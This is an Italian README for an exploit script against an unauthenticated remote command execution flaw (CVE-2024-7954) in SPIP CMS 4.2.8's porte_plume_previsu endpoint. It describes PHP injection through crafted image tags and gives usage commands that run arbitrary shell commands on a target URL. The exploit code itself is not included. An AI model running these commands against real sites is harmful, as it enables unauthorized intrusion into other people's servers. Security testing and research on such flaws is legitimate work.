
Exploit di esecuzione remota di comandi non autenticata per SPIP CMS 4.2.8 (CVE-2024-7954) con supporto proxy e recupero dell'output in tempo reale.
Questo script sfrutta una vulnerabilità di esecuzione remota di codice in SPIP versione 4.2.8 tramite l'endpoint porte_plume_previsu. La vulnerabilità consente ad attaccanti non autenticati di iniettare codice PHP attraverso il rendering dell'anteprima di tag immagine appositamente costruiti.
ID CVE: CVE-2024-7954
Componente: SPIP CMS (porte_plume_previsu)
Impatto: Esecuzione remota di comandi non autenticata
Gravità: Critica
python3 cve_2024_7954_rce.py --url <TARGET_URL> --cmd <COMMAND> [--proxy <IP:PORT>]
python3 cve_2024_7954_rce.py --url <TARGET_URL> --cmd "whoami" --proxy "127.0.0.1:8080"


python3 cve_2024_7954_rce.py --url <TARGET_URL> --cmd "id" --proxy "127.0.0.1:8080"


python3 cve_2024_7954_rce.py --url <TARGET_URL> --cmd "uname -a" --proxy "127.0.0.1:8080"


Questo script di exploit è destinato esclusivamente a test di sicurezza autorizzati, ricerca difensiva e scopi educativi.